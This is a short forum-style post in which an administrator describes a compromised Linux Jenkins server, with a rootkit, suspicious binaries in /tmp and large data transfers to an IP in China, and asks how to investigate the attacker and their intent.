My Linux Jenkins server was compromised and a Rootkit was installed. I know this since a running process tells me the path Jenkins job is running and it includes a URL with path pointing to a Python script. On a different host I opened that script and found several scripts that attempt to install a Rootkit along with a destination URL to presumably tell them which Rootkit was successful.
I can see some questionable binaries under /tmp. I opened one of those binaries with a de compiler but I'm not sure what to look for.
So, what does one do in this situation to find out more about the attacker and possibly what the intent was?
Asking here since none of the books or articles I've read address those two questions. I do know I have to assume any data on that host was compromised. My goal is to learn more about the attacker and the attack.
Other info, I became aware when the network team noticed GBs of data outgoing from our Linux Jenkins host. They closed the port and we unplugged the host. The ip that the job is getting the Python script from appears to be coming from the US, but nothing more specific according to IP lookups. The destination IP is going to Jinan, China.
Aucun commentaire:
Enregistrer un commentaire